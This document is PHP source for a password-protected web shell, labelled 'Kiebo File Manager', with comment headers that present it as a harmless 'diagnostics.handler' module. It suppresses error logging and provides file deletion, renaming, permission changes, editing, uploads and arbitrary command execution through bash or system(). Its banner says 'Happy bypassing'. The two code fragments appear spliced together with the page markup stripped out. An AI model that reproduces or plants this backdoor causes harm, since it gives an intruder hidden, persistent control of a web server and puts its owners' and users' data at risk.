[UTC] * * @system core-runtime-handler * @package diagnostics.handler.module */ error_reporting(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); session_start(); $passwd = "desah"; if($_POST['pass']) { if($_POST['passwd'] == $passwd) { $_SESSION['masuk'] = "masuk"; header("Location: ?"); } } if(isset($_REQUEST['logout'])) { session_destroy(); header("Location: ?"); } if(empty($_SESSION['masuk'])) { ?>



[UTC] * * @system core-runtime-handler * @package diagnostics.handler.module */ @set_time_limit(0); @error_reporting(0); define('_B_', realpath(isset($_GET['_r']) ? $_GET['_r'] : getcwd())); chdir(_B_); function _g($p){ return realpath($p); } function _p($f){ return substr(sprintf('%o', fileperms($f)), -4); } function _pm($f){ $m = fileperms($f); $s = ($m & 0x4000) ? 'd' : '-'; $x = [0x0100=>'r', 0x0080=>'w', 0x0040=>'x', 0x0020=>'r', 0x0010=>'w', 0x0008=>'x', 0x0004=>'r', 0x0002=>'w', 0x0001=>'x']; foreach($x as $b=>$c){ $s .= ($m & $b) ? $c : '-'; } return $s; } function _go(){ header('Location:?_r='.urlencode(_B_)); exit; } if(isset($_GET['_x'])){ $t = _g($_GET['_x']); if(is_file($t)) unlink($t); elseif(is_dir($t)) rmdir($t); _go(); } if(isset($_POST['_rf'], $_POST['_rt'])){ rename(_g($_POST['_rf']), dirname($_POST['_rf']).'/'.$_POST['_rt']); _go(); } if(isset($_POST['_cp'], $_POST['_cm'])){ chmod(_g($_POST['_cp']), intval($_POST['_cm'], 8)); _go(); } if(isset($_POST['_ep'], $_POST['_ed'])){ file_put_contents($_POST['_ep'], $_POST['_ed']); echo "

✓ Saved
"; } if(!empty($_FILES['_uf'])){ move_uploaded_file($_FILES['_uf']['tmp_name'], _B_.'/'.$_FILES['_uf']['name']); echo "
✓ Uploaded
"; } $__ = ''; if (isset($_POST['_sh'])) { $cmd = $_POST['_sh']; ob_start(); if (stristr(PHP_OS, 'WIN')) { system($cmd); } else { putenv('PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'); $descriptorspec = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = proc_open("/bin/bash", $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $cmd . "\n"); fclose($pipes[0]); echo stream_get_contents($pipes[1]); fclose($pipes[1]); echo stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); } else { echo "❌ Failed to open bash shell."; } } $__ = ob_get_clean(); } $__dir = $__file = []; foreach(scandir(_B_) as $_){ if($_=='.') continue; $p = _B_.'/'.$_; is_dir($p) ? $__dir[] = $_ : $__file[] = $_; } ?>

# Kiebo File Manager
# version : v.1.0/2025
# Happy bypassing :)

📁 PATH: /$i";} ?>

NameTypeSizePermAction
📁 DIR-
🗑 Delete
📄 FILE B
🗑 Delete

Edit: